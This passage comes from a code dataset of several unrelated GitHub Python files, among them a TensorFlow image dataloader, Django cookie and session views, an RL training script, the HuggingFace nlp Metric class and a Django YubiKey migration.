crop_width, []), dtype=tf.int64\n )\n offset_y = tf.random.uniform(\n [1], 0, tf.reshape(height - crop_height, []), dtype=tf.int64\n )\n\n log.debug(f'Sampled offsets: x: {offset_x}, y: {offset_y}')\n\n log.debug(f'Original bounding box: {bndbox}')\n\n x0, x1 = bndbox[0] - offset_x, bndbox[1] + (width - crop_width - offset_x)\n y0, y1 = bndbox[2] - offset_y, bndbox[3] + (\n height - crop_height - offset_y\n )\n\n box = [x0, x1, y0, y1]\n\n box = list(map(lambda x: tf.squeeze(tf.cast(x, tf.int32)), box))\n box = shift_upper(box, max_x, max_y)\n box = list(map(lambda x: tf.squeeze(tf.cast(x, tf.int32)), box))\n box = shift_lower(box)\n log.debug(f'Updated bounding box: {box}')\n\n return crop_and_pad(image, box, width, height)\n\n\ndef center_crop_bbox(\n image: tf.Tensor, bndbox: list, width: int = 299, height: int = 299\n) -> tf.Tensor:\n \"\"\"\n Center crop an area around a bounding box to a fixed size.\n If output size is greater than maximum crop size the image will\n be zero-padded.\n\n Parameters\n ----------\n image : tf.Tensor\n image array of size [height, width, 3]\n bndbox : List[int]\n Bounding box in the shape [x0, x1, y0, y1].\n width : int\n Cropped image width\n height : int\n Cropped image height\n\n Returns\n -------\n Crop of image.\n \"\"\"\n y_max, x_max = tf.shape(image)[0], tf.shape(image)[1]\n\n crop_width = bndbox[1] - bndbox[0]\n crop_height = bndbox[3] - bndbox[2]\n\n x0, x1, y0, y1 = bndbox\n x0 -= tf.cast(tf.math.floor((width - crop_width) / 2), tf.int64)\n x1 += tf.cast(tf.math.ceil((width - crop_width) / 2), tf.int64)\n y0 -= tf.cast(tf.math.floor((height - crop_height) / 2), tf.int64)\n y1 += tf.cast(tf.math.ceil((height - crop_height) / 2), tf.int64)\n\n x0 = tf.cast(x0, tf.int32)\n x1 = tf.cast(x1, tf.int32)\n y0 = tf.cast(y0, tf.int32)\n y1 = tf.cast(y1, tf.int32)\n box = shift_upper([x0, x1, y0, y1], x_max, y_max)\n box = shift_lower(box)\n\n return crop_and_pad(image, box, width, height)\n\n\ndef crop_and_pad(\n image: tf.Tensor, bndbox: List[int], width: int = 299, height: int = 299\n) -> tf.Tensor:\n \"\"\"\n Crop image to specific size using bounding box,\n zero-pad if crop is too large.\n\n Parameters\n ----------\n image : tf.Tensor\n image array of size [height, width, 3]\n bndbox : List[int]\n Bounding box in the shape [x0, x1, y0, y1].\n width : int\n Cropped image width\n height : int\n Cropped image height\n\n Returns\n -------\n Crop of image.\n \"\"\"\n\n bndbox = list(map(lambda x: tf.squeeze(tf.cast(x, tf.int32)), bndbox))\n x0, x1, y0, y1 = bndbox\n\n image = image[y0:y1, x0:x1, :]\n image = tf.image.pad_to_bounding_box(image, 0, 0, height, width)\n\n return image\n\n\ndef read_image(\n image_path: str,\n fmt: Optional[str] = None,\n adaptive_threshold: bool = False,\n) -> tf.Tensor:\n image = tf.io.read_file(image_path)\n\n if fmt == 'png':\n image = tf.image.decode_png(image, channels=3)\n elif fmt == 'jpeg':\n image = tf.image.decode_jpeg(image, channels=3)\n else:\n image = tf.image.decode_image(image, channels=3)\n\n # does only work in eager mode\n if adaptive_threshold:\n image = image.numpy().astype(np.uint8)\n image = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n image = cv.adaptiveThreshold(\n image,\n 255.0,\n cv.ADAPTIVE_THRESH_GAUSSIAN_C,\n cv.THRESH_BINARY_INV,\n 15,\n 3,\n )\n image = cv.cvtColor(image, cv.COLOR_GRAY2BGR)\n image = tf.convert_to_tensor(image, tf.float32)\n else:\n image = tf.cast(image, tf.float32)\n\n return image\n\n\ndef augment(image: tf.Tensor) -> tf.Tensor:\n \"\"\"\n Augments 3-channel image tensors.\n\n Parameters\n ----------\n image: tf.Tensor\n\n Returns\n -------\n tf.Tensor\n \"\"\"\n image = tf.image.random_flip_left_right(image)\n image = tf.image.random_flip_up_down(image)\n image = tf.image.random_contrast(image, 0.0, 0.8)\n image = tf.image.random_saturation(image, 0.0, 4.0)\n image = tf.image.random_brightness(image, 0.5)\n return image\n\n\ndef preprocess(\n image: tf.Tensor,\n bbox: List[tf.Tensor],\n width: int = 299,\n height: int = 299,\n random_crop: bool = True,\n augment_data: bool = True,\n preprocess_fn: Callable = None,\n):\n if random_crop:\n image = random_crop_bbox(image, bbox, width, height)\n else:\n image = center_crop_bbox(image, bbox, width, height)\n\n if augment_data:\n image = augment(image)\n if preprocess_fn is not None:\n image = preprocess_fn(image)\n\n return image\n","repo_name":"antolu/aisi-joints","sub_path":"aisi_joints/img_cls/_dataloader.py","file_name":"_dataloader.py","file_ext":"py","file_size_in_byte":9892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7193921781","text":"import numpy as np\nimport pandas as pd\nfrom pandas_profiling import ProfileReport\n#print(np.random.rand(100, 5))\ndf = pd.DataFrame([[33256]], columns=[\"TotalUsers\"])\n#profile = ProfileReport(df, title=\"Welcome to IdP Reporting\")\nprofile = df.profile_report(\n interactions ={\n \"continuous\":False,\n },\n correlations={\n \"pearson\": {\"calculate\": False},\n \"spearman\": {\"calculate\": False},\n \"kendall\": {\"calculate\": False},\n \"phi_k\": {\"calculate\": False},\n \"cramers\": {\"calculate\": False},\n },\n missing_diagrams={\n \"heatmap\": False,\n \"dendrogram\": False,\n \"matrix\":False,\n \"bar\":False,\n },\n title=\"IdP Reporting\",\n sort=\"ascending\",\n variables = {\n \"descriptions\":{\n \"Explicaicon por dentro\":\"VAmos a ver\"\n }\n },\n vars={\n \"num\": {\n \"quantiles\":[0.0,1.0],\n \"skewness_threshold\":0,\n \"low_categorical_threshold\": 0,\n },\n \"cat\": {\n \"length\": False,\n \"characters\": False,\n \"words\": False,\n \"cardinality_threshold\":0,\n \"chi_squared_threshold\":0.0,\n \"n_obs\": 0,\n },\n \"bool\": {\n \"n_obs\": 0\n }\n },\n)\n\nprofile.config.variables.descriptions = {\n \"TotalUsers\": \"Usuarios ingresados durante la semana\",\n}\n\nprofile.config.html.minify_html = True\nprofile.to_file(\"report.html\")\n\n#profile.to_file(\"your_report.html\")","repo_name":"juliandecoss/scripts","sub_path":"nogit/aws/src/cloudwatch/pandas_pro.py","file_name":"pandas_pro.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6078628853","text":"from django.urls import path\nfrom . import views\nfrom users.views import AccountDetailView, Leaderboard\n\napp_name = \"users\"\n\nurlpatterns = [\n path(\"leaderboard/\", Leaderboard.as_view(), name=\"leaderboard\"),\n path(\"profile/register/\", views.signup, name=\"register\"),\n path(\"profile/edit/\", views.profile, name=\"profile\"),\n path(\"user//\", AccountDetailView.as_view(), name=\"profilepage\"),\n]\n","repo_name":"The-Domecode/domecode-opensource","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"37"} +{"seq_id":"73573527466","text":"from django.contrib.auth.views import LogoutView\nfrom django.urls import reverse_lazy\nfrom django.http import HttpResponse, HttpRequest\n\n\nclass MyLogoutView(LogoutView):\n next_page = reverse_lazy('myauth:login')\n\n\ndef set_cookie_view(request: HttpRequest) -> HttpResponse:\n response = HttpResponse(\"Cookies were successfully set\")\n response.set_cookie(\"user\",\n request.META['USER'],\n max_age=1800,\n httponly=True,\n )\n response.set_cookie(\"userIP\",\n request.META['REMOTE_ADDR'],\n max_age=1800,\n httponly=True,\n )\n return response\n\n\ndef get_cookie_view(request: HttpRequest) -> HttpResponse:\n user = request.COOKIES.get(\"user\", \"no user\")\n user_ip = request.COOKIES.get(\"userIP\", \"no IP\")\n return HttpResponse(f\"

    Cookies set by set_cookie_view function:

    \"\n f\"Username = {user!r}
    User IP = {user_ip}\")\n\n\ndef set_session_view(request: HttpRequest) -> HttpResponse:\n key = \"homework_status\"\n value = \"completed\"\n request.session[key] = value\n return HttpResponse(f\"

    Session key = {key} successfully set to {value!r}

    \")\n\n\ndef get_session_view(request: HttpRequest) -> HttpResponse:\n key = \"homework_status\"\n value = request.session.get(key, \"unknown\")\n return HttpResponse(f\"

    Session Homework Status

    {key} is {value!r} now.\")\n","repo_name":"MikhailNartsissov/SkillboxDjango","sub_path":"M_08_Auth/mysite/myauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70083579308","text":"import sys\n\ninput = sys.stdin.readline\n\nh, m, s = list(map(int, input().split()))\n\nq = int(input())\n\nfor _ in range(q):\n k = list(map(int, input().split()))\n\n if k[0] == 3:\n print(h, m, s)\n else:\n k[1] %= 24 * 60 * 60 # s가 음수가 되지 않도록 반복 회전에 대해 나머지 처리\n if k[0] == 1:\n s += k[1]\n else:\n s += 24 * 60 * 60 - k[1]\n\n if s >= 60:\n m += int(s / 60)\n s %= 60\n if m >= 60:\n h += int(m / 60)\n m %= 60\n if h >= 24:\n h %= 24\n","repo_name":"jeongth9446/problem-solving","sub_path":"acmicpc/python/12840_창용이의 시계.py","file_name":"12840_창용이의 시계.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"6103035322","text":"from tactile_gym.rl_envs.demo_rl_env_base import demo_rl_env\nfrom tactile_gym.rl_envs.exploration.surface_follow.surface_follow_goal.surface_follow_goal_env import (\n SurfaceFollowGoalEnv,\n)\n\nimport torch\nimport os\nimport numpy as np\nfrom stable_baselines3 import DDPG, TD3, A2C,HerReplayBuffer\nfrom stable_baselines3.common.callbacks import CheckpointCallback\nfrom stable_baselines3.common.callbacks import EvalCallback\nfrom stable_baselines3.common.noise import NormalActionNoise\nimport h5py\nimport imageio\nfrom sb3_contrib import TQC\n\ndef main():\n\n seed = int(0)\n num_iter = 100\n max_steps = 1000\n show_gui = True\n show_tactile = False\n render = False\n model_test = True\n print_info = False\n image_size = [128, 128]\n env_modes = {\n # which dofs can have movement\n # 'movement_mode':'yz',\n # 'movement_mode':'xyz',\n # 'movement_mode':'yzRx',\n #\"movement_mode\": \"xRz\",\n \"movement_mode\": \"xyzRxRy\",\n\n # specify arm\n \"arm_type\": \"ur5\",\n\n # specify tactile sensor\n \"tactile_sensor_name\": \"tactip\",\n # \"tactile_sensor_name\": \"digit\",\n # \"tactile_sensor_name\": \"digitac\",\n\n # the type of control used\n # 'control_mode':'TCP_position_control',\n \"control_mode\": \"TCP_velocity_control\",\n\n # noise params for additional robustness\n \"noise_mode\": \"simplex\",\n\n # which observation type to return\n #'observation_mode': 'oracle',\n # \"observation_mode\": \"tactile_and_feature\",\n # 'observation_mode':'visual_and_feature',\n # 'observation_mode':'visuotactile_and_feature',\n 'observation_mode':'encodedimg_privilege_feature',\n\n # which reward type to use (currently only dense)\n \"reward_mode\": \"dense\"\n # 'reward_mode':'sparse'\n }\n\n env = SurfaceFollowGoalEnv(\n max_steps=max_steps,\n env_modes=env_modes,\n show_gui=show_gui,\n show_tactile=show_tactile,\n image_size=image_size,\n )\n\n # set seeding\n env.seed(seed)\n \n #env.action_space.np_random.seed(seed)\n print(env.observation_space)\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n \n action_noise = NormalActionNoise(mean=np.zeros(env.action_space.shape[-1]), sigma=0.1 * np.ones(env.action_space.shape[-1]))\n \n policy_kwargs = dict(n_critics=2, activation_fn=torch.nn.ReLU, net_arch=[512, 256, 128])\n #policy_kwargs = dict(activation_fn=torch.nn.ReLU, net_arch=[512, 256, 128])\n\n model = TQC(\"MultiInputPolicy\", env,learning_rate=1e-3, batch_size=256,\n tau=0.001, gamma=0.95, action_noise=action_noise, buffer_size=int(1e6), train_freq=(5, 'step'),\n learning_starts=10000, policy_kwargs=policy_kwargs, device=device,tensorboard_log=\"../tensorboard_logs/surface/\",verbose=1)\n #model = RecurrentPPO(\"MultiInputLstmPolicy\", env, learning_rate=1e-3, batch_size=256, policy_kwargs=policy_kwargs, device=device,tensorboard_log=\"../tensorboard_logs/\",verbose=1)\n render_frames = []\n if model_test:\n #model = TQC.load(\"../model/tactile_vae.zip\", env)\n obs = env.reset()\n sum_reward = 0\n for i in range(5):\n obs = env.reset()\n #print(obs)\n for i in range(1000):\n #print(type(obs))\n action,_ = model.predict(observation=obs)\n #print(type(action))\n #action = env.action_space.sample()\n #f.create_dataset('data_'+str(i), data=env.current_img)\n \n action = [0,0,0,0,0.1]\n print(action)\n obs, reward, done, info = env.step(action)\n #print(obs)\n sum_reward += reward\n if done:\n break\n render_img = env.render()\n render_frames.append(render_img)\n #print(sum_reward)\n sum_reward = 0 \n #imageio.mimwrite(os.path.join(\"example_videos\", \"surface.mp4\"), np.stack(render_frames), fps=12)\n else : \n if os.path.exists(\"../model/surface/best_model.zip\"):\n #model = SAC.load(\"../model/tactile_vae.zip\",env)\n print(\"pretrain\")\n eval_callback = EvalCallback(env, best_model_save_path='../model_checkpoints/edge/',\n log_path='../model_checkpoints/logs/', eval_freq=10000,\n deterministic=True, render=False)\n model.learn(total_timesteps=500000, callback=eval_callback)\n model.save(\"../model_checkpoints/surface/model.zip\")\n \n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Peng-Bryant/Learning_based-Tactile-Feedback-Control-Framework","sub_path":"tactile_gym/scripts/tactile_rl_surface.py","file_name":"tactile_rl_surface.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3803300428","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport tensorflow as tf\n\nfrom .square_curlfree import SquareCurlFree\nfrom kscore.utils import median_heuristic\n\nclass CurlFreeIMQ(SquareCurlFree):\n def __init__(self, kernel_hyperparams=None, heuristic_hyperparams=median_heuristic):\n super().__init__(kernel_hyperparams, heuristic_hyperparams)\n\n def _gram_derivatives_impl(self, r, norm_rr, sigma):\n inv_sqr_sigma = 1.0 / tf.square(sigma)\n imq = tf.math.rsqrt(1.0 + norm_rr * inv_sqr_sigma) # [M, N]\n imq_2 = 1.0 / (1.0 + norm_rr * inv_sqr_sigma)\n G_1st = -0.5 * imq_2 * inv_sqr_sigma * imq\n G_2nd = -1.5 * imq_2 * inv_sqr_sigma * G_1st\n G_3rd = -2.5 * imq_2 * inv_sqr_sigma * G_2nd\n return r, norm_rr, G_1st, G_2nd, G_3rd\n\nclass CurlFreeIMQp(SquareCurlFree):\n def __init__(self, p=0.5, kernel_hyperparams=None, heuristic_hyperparams=median_heuristic):\n super().__init__(kernel_hyperparams, heuristic_hyperparams)\n self._p = p\n\n def _gram_derivatives_impl(self, r, norm_rr, sigma):\n inv_sqr_sigma = 1.0 / tf.square(sigma)\n imq = 1.0 / (1.0 + norm_rr * inv_sqr_sigma)\n imq_p = tf.pow(imq, self._p) # [M, N]\n G_1st = -(0. + self._p) * imq * inv_sqr_sigma * imq_p\n G_2nd = -(1. + self._p) * imq * inv_sqr_sigma * G_1st\n G_3rd = -(2. + self._p) * imq * inv_sqr_sigma * G_2nd\n return r, norm_rr, G_1st, G_2nd, G_3rd\n","repo_name":"miskcoo/kscore","sub_path":"kscore/kernels/curlfree_imq.py","file_name":"curlfree_imq.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} +{"seq_id":"2348163850","text":"import logging\nimport os\nimport types\nfrom contextlib import contextmanager\nfrom typing import Any, Dict, Optional\n\nimport numpy as np\nimport pyarrow as pa\nfrom filelock import FileLock, Timeout\n\nfrom .arrow_dataset import Dataset\nfrom .arrow_reader import ArrowReader\nfrom .arrow_writer import ArrowWriter\nfrom .info import MetricInfo\nfrom .naming import camelcase_to_snakecase\nfrom .utils import HF_METRICS_CACHE, Version, copyfunc\nfrom .utils.download_manager import DownloadManager\nfrom .utils.file_utils import DownloadConfig\n\n\nlogger = logging.getLogger(__file__)\n\n\n@contextmanager\ndef temp_seed(seed: int):\n state = np.random.get_state()\n np.random.seed(seed)\n try:\n yield\n finally:\n np.random.set_state(state)\n\n\nclass Metric(object):\n def __init__(\n self,\n name: str = None,\n experiment_id: Optional[str] = None,\n process_id: int = 0,\n num_process: int = 1,\n data_dir: Optional[str] = None,\n in_memory: bool = False,\n hash: str = None,\n seed: Optional[int] = None,\n **kwargs,\n ):\n \"\"\" A Metrics is the base class and common API for all metrics.\n Args:\n process_id (``int``): specify the id of the node in a distributed settings between 0 and num_nodes-1\n This can be used, to compute metrics on distributed setups\n (in particular non-additive metrics like F1).\n data_dir (``str``): path to a directory in which temporary data will be stored.\n This should be a shared file-system for distributed setups.\n hash (``str``): can be used to define a hash specific to the metrics computation script\n This prevents the metric's data to be overridden when the metric loading script is modified.\n experiment_id (Optional ``str``): Should be used if you perform several concurrent experiments using\n the same caching directory (will be indicated in the raise error)\n in_memory (``bool``): keep all predictions and references in memory. Not possible in distributed settings.\n seed (Optional ``int``): If specified, this will temporarily set numpy's random seed when :func:`nlp.Metric.compute` is run.\n \"\"\"\n # Safety checks\n assert isinstance(process_id, int) and process_id >= 0, \"'process_id' should be a number greater than 0\"\n assert (\n isinstance(num_process, int) and num_process > process_id\n ), \"'num_process' should be a number greater than process_id\"\n assert (\n process_id == 0 or not in_memory\n ), \"Using 'in_memory' is not possible in distributed setting (process_id > 0).\"\n\n # Metric name\n self.name = camelcase_to_snakecase(self.__class__.__name__)\n # Configuration name\n self.config_name: str = name or \"default\"\n\n self.process_id = process_id\n self.num_process = num_process\n self.in_memory = in_memory\n self.experiment_id = experiment_id if experiment_id is not None else \"cache\"\n self.hash = hash\n self._version = \"1.0.0\"\n self._data_dir_root = os.path.expanduser(data_dir or HF_METRICS_CACHE)\n self.data_dir = self._build_data_dir()\n self.seed: int = seed or np.random.get_state()[1][0]\n\n # prepare info\n info = self._info()\n info.metric_name = self.name\n info.config_name = self.config_name\n info.version = self._version\n self.info = info\n\n # Update 'compute' and 'add' docstring\n # methods need to be copied otherwise it changes the docstrings of every instance\n self.compute = types.MethodType(copyfunc(self.compute), self)\n self.add_batch = types.MethodType(copyfunc(self.add_batch), self)\n self.add = types.MethodType(copyfunc(self.add), self)\n self.compute.__func__.__doc__ += self.info.inputs_description\n self.add_batch.__func__.__doc__ += self.info.inputs_description\n self.add.__func__.__doc__ += self.info.inputs_description\n\n self.arrow_schema = pa.schema(field for field in self.info.features.type)\n self.buf_writer = None\n self.writer = None\n self.writer_batch_size = None\n self.data = None\n\n # Check we can write on the cache file without competitors\n self.cache_file_name = self._get_cache_path(self.process_id)\n self.filelock = FileLock(self.cache_file_name + \".lock\")\n try:\n self.filelock.acquire(timeout=1)\n except Timeout:\n raise ValueError(\n \"Cannot acquire lock, caching file might be used by another process, \"\n \"you should setup a unique 'experiment_id' for this run.\"\n )\n\n def _relative_data_dir(self, with_version=True):\n \"\"\" Relative path of this metric in cache_dir:\n Will be:\n self.name/self.config_name/self.config.version/self.hash/\n If any of these element is missing or if ``with_version=False`` the corresponding subfolders are dropped.\n \"\"\"\n builder_data_dir = os.path.join(self.name, self.config_name)\n if with_version:\n builder_data_dir = os.path.join(builder_data_dir, str(self._version))\n if self.hash:\n builder_data_dir = os.path.join(builder_data_dir, self.hash)\n return builder_data_dir\n\n def _build_data_dir(self):\n \"\"\" Return the directory for the current version.\n \"\"\"\n builder_data_dir = os.path.join(self._data_dir_root, self._relative_data_dir(with_version=False))\n version_data_dir = os.path.join(self._data_dir_root, self._relative_data_dir(with_version=True))\n\n def _other_versions_on_disk():\n \"\"\"Returns previous versions on disk.\"\"\"\n if not os.path.exists(builder_data_dir):\n return []\n\n version_dirnames = []\n for dir_name in os.listdir(builder_data_dir):\n try:\n version_dirnames.append((Version(dir_name), dir_name))\n except ValueError: # Invalid version (ex: incomplete data dir)\n pass\n version_dirnames.sort(reverse=True)\n return version_dirnames\n\n # Check and warn if other versions exist on disk\n version_dirs = _other_versions_on_disk()\n if version_dirs:\n other_version = version_dirs[0][0]\n if other_version != self._version:\n warn_msg = (\n \"Found a different version {other_version} of metric {name} in \"\n \"data_dir {data_dir}. Using currently defined version \"\n \"{cur_version}.\".format(\n other_version=str(other_version),\n name=self.name,\n data_dir=self._data_dir_root,\n cur_version=str(self._version),\n )\n )\n logger.warning(warn_msg)\n\n os.makedirs(version_data_dir, exist_ok=True)\n return version_data_dir\n\n def _get_cache_path(self, node_id):\n return os.path.join(self.data_dir, f\"{self.experiment_id}-{self.name}-{node_id}.arrow\")\n\n def finalize(self, timeout=120):\n \"\"\" Close all the writing process and load/gather the data\n from all the nodes if main node or all_process is True.\n \"\"\"\n self.writer.finalize()\n self.writer = None\n self.buf_writer = None\n self.filelock.release()\n\n if self.process_id == 0:\n # Let's acquire a lock on each node files to be sure they are finished writing\n node_files = []\n locks = []\n for node_id in range(self.num_process):\n node_file = self._get_cache_path(node_id)\n filelock = FileLock(node_file + \".lock\")\n filelock.acquire(timeout=timeout)\n node_files.append({\"filename\": node_file})\n locks.append(filelock)\n\n # Read the predictions and references\n reader = ArrowReader(path=self.data_dir, info=None)\n self.data = Dataset(**reader.read_files(node_files))\n\n # Release all of our locks\n for lock in locks:\n lock.release()\n\n def compute(self, predictions=None, references=None, timeout=120, **metrics_kwargs):\n \"\"\" Compute the metrics.\n \"\"\"\n if predictions is not None:\n self.add_batch(predictions=predictions, references=references)\n self.finalize(timeout=timeout)\n\n self.data.set_format(type=self.info.format)\n\n predictions = self.data[\"predictions\"]\n references = self.data[\"references\"]\n with temp_seed(self.seed):\n output = self._compute(predictions=predictions, references=references, **metrics_kwargs)\n return output\n\n def add_batch(self, predictions=None, references=None, **kwargs):\n \"\"\" Add a batch of predictions and references for the metric's stack.\n \"\"\"\n batch = {\"predictions\": predictions, \"references\": references}\n if self.writer is None:\n self._init_writer()\n self.writer.write_batch(batch)\n\n def add(self, prediction=None, reference=None, **kwargs):\n \"\"\" Add one prediction and reference for the metric's stack.\n \"\"\"\n example = {\"predictions\": prediction, \"references\": reference}\n example = self.info.features.encode_example(example)\n if self.writer is None:\n self._init_writer()\n self.writer.write(example)\n\n def _init_writer(self):\n if self.in_memory:\n self.buf_writer = pa.BufferOutputStream()\n self.writer = ArrowWriter(\n schema=self.arrow_schema, stream=self.buf_writer, writer_batch_size=self.writer_batch_size\n )\n else:\n self.buf_writer = None\n self.writer = ArrowWriter(\n schema=self.arrow_schema, path=self.cache_file_name, writer_batch_size=self.writer_batch_size\n )\n\n def _info(self) -> MetricInfo:\n \"\"\"Construct the MetricInfo object. See `MetricInfo` for details.\n\n Warning: This function is only called once and the result is cached for all\n following .info() calls.\n\n Returns:\n info: (MetricInfo) The metrics information\n \"\"\"\n raise NotImplementedError\n\n def download_and_prepare(\n self,\n download_config: Optional[DownloadConfig] = None,\n dl_manager: Optional[DownloadManager] = None,\n **download_and_prepare_kwargs,\n ):\n \"\"\"Downloads and prepares dataset for reading.\n\n Args:\n download_config (Optional ``nlp.DownloadConfig``: specific download configuration parameters.\n dl_manager (Optional ``nlp.DownloadManager``): specific Download Manger to use\n \"\"\"\n if dl_manager is None:\n if download_config is None:\n download_config = DownloadConfig()\n download_config.cache_dir = os.path.join(self.data_dir, \"downloads\")\n download_config.force_download = False\n\n dl_manager = DownloadManager(\n dataset_name=self.name, download_config=download_config, data_dir=self.data_dir\n )\n\n self._download_and_prepare(dl_manager)\n\n def _download_and_prepare(self, dl_manager):\n \"\"\"Downloads and prepares resources for the metric.\n\n This is the internal implementation to overwrite called when user calls\n `download_and_prepare`. It should download all required resources for the metric.\n\n Args:\n dl_manager: (DownloadManager) `DownloadManager` used to download and cache\n data..\n \"\"\"\n return None\n\n def _compute(self, predictions=None, references=None, **kwargs) -> Dict[str, Any]:\n \"\"\" This method defines the common API for all the metrics in the library \"\"\"\n raise NotImplementedError\n","repo_name":"MachineLearningBCAM/Minimax-risk-classifiers-NeurIPS-2020","sub_path":"venv/lib/python3.6/site-packages/nlp/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":12080,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"36465834567","text":"from mpl_toolkits import mplot3d\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport ioUtils\nfrom handleColor import colorDecompact\n\n\ndef makeGraph():\n learned = ioUtils.getLearned()\n\n # Creating figure\n fig = plt.figure(figsize=(10, 10))\n ax = plt.axes(projection=\"3d\")\n colorToMLib = {\n \"RED\":\"red\",\n \"ORANGE\":\"darkorange\",\n \"YELLOW\":\"yellow\",\n \"GREEN\":\"green\",\n \"BLUE\":\"blue\",\n \"PURPLE\":\"purple\",\n \"PINK\":\"hotpink\",\n \"BROWN\":\"brown\",\n \"WHITE\":\"white\",\n \"LIGHT GRAY\":\"lightgray\",\n \"DARK GRAY\":\"darkgray\",\n \"BLACK\":\"black\"\n }\n # Creating plot\n for l in learned:\n x = []\n y = []\n z = []\n for c in learned[l]:\n colorRgb = colorDecompact(c[0])\n x.append(colorRgb[0])\n y.append(colorRgb[1])\n z.append(colorRgb[2])\n color = \"blue\"\n if l in colorToMLib:\n color = colorToMLib[l]\n ax.scatter3D(x, y, z, color=color, alpha=1)\n ax.set_xlabel('Red')\n ax.set_ylabel('Green')\n ax.set_zlabel('Blue')\n plt.savefig('graph.png', transparent=True)\n","repo_name":"Silber01/ColorLearn","sub_path":"makeGraph.py","file_name":"makeGraph.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20404942176","text":"charge2symbol={1:\"H\",2:\"He\",3:\"Li\",4:\"Be\",5:\"B\",6:\"C\",7:\"N\",8:\"O\",9:\"F\",10:\"Ne\"}\n\ndef alias_param(param_name: str, param_alias: str):\n \"\"\"\n Decorator for aliasing a param in a function\n Args:\n param_name: name of param in function to alias\n param_alias: alias that can be used for this param\n Returns:\n \"\"\"\n def decorator(func):\n def wrapper(*args, **kwargs):\n alias_param_value = kwargs.get(param_alias)\n if param_alias in kwargs.keys():\n kwargs[param_name] = alias_param_value\n del kwargs[param_alias]\n result = func(*args, **kwargs)\n return result\n return wrapper\n return decorator\n\n\ndef printxyz(coords,al,fn):\n atomnumber={1:\"H\",5:\"B\",6:\"C\",7:\"N\"}\n assert len(al)==len(coords)\n with open(fn,\"w\")as xyzf:\n xyzf.write(str(len(al))+\" \\n\" )\n xyzf.write(\"molecule \\n\" )\n for i in range(len(coords)):\n xyzf.write(atomnumber[al[i]]+\" \"+str(coords[i])[1:-1]+\"\\n\")\n return\n\n\ndef parse_charge(dL):\n \"\"\" There are two options: \n 1) call FcM(**kwargs,fcs=[c1,c2,--cn]) with a list of length equal to the number of atoms\n 2) FcM(**kwargs,fcs=[[aidx1,aidx2,..,aidxn],[c1,c2,..cn]]) with a list of two sublist for atoms' indexes and fract charges\n \"\"\"\n a=[[],[]]\n parsed=False\n if len(dL) ==2: #necessario, ma non sufficiente per caso 2\n try:\n len(dL[0])==len(dL[1])\n if isinstance(dL[0][0],int) or isinstance(dL[0][0],float):\n parsed=True\n except: pass\n if not parsed and (isinstance(dL[0],int) or isinstance(dL[0],float)): #move to case2 \n for i in range(len(dL)):\n if dL[i]!=0:\n a[0].append(i)\n a[1].append(dL[i])\n dL=a\n parsed=True\n if not parsed:\n print(\"Failed to parse charges\")\n raise\n return dL\n\ndef DeltaV(mol,dL):\n \"\"\"dL=[[i1,i2,i3],[c1,c2,c3]]\"\"\"\n mol.set_rinv_orig_(mol.atom_coords()[dL[0][0]])\n dV=mol.intor('int1e_rinv')*dL[1][0]\n for i in range(1,len(dL[0])): \n mol.set_rinv_orig_(mol.atom_coords()[dL[0][i]])\n dV+=mol.intor('int1e_rinv')*dL[1][i]\n return -dV","repo_name":"ferchault/APDFT","sub_path":"prototyping/hessian/Repository_Alchemical_Forces/AP_utils.py","file_name":"AP_utils.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"6312766545","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport otp_yubikey.models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='RemoteYubikeyDevice',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(help_text='The human-readable name of this device.', max_length=64)),\n ('confirmed', models.BooleanField(default=True, help_text='Is this device ready for use?')),\n ('public_id', models.CharField(help_text='The public identity of the YubiKey (modhex-encoded).', max_length=32, verbose_name='Public ID')),\n ],\n options={\n 'abstract': False,\n 'verbose_name': 'Remote YubiKey device',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ValidationService',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(help_text='The name of this validation service.', max_length=32)),\n ('api_id', models.IntegerField(default=1, help_text='Your API ID.', verbose_name='API ID')),\n ('api_key', models.CharField(default='', help_text='Your base64-encoded API key.', max_length=64, verbose_name='API key', blank=True)),\n ('base_url', models.URLField(default='', help_text=\"The base URL of the verification service. Defaults to Yubico's hosted API.\", verbose_name='Base URL', blank=True)),\n ('api_version', models.CharField(default='2.0', help_text='The version of the validation api to use.', max_length=8, choices=[('1.0', 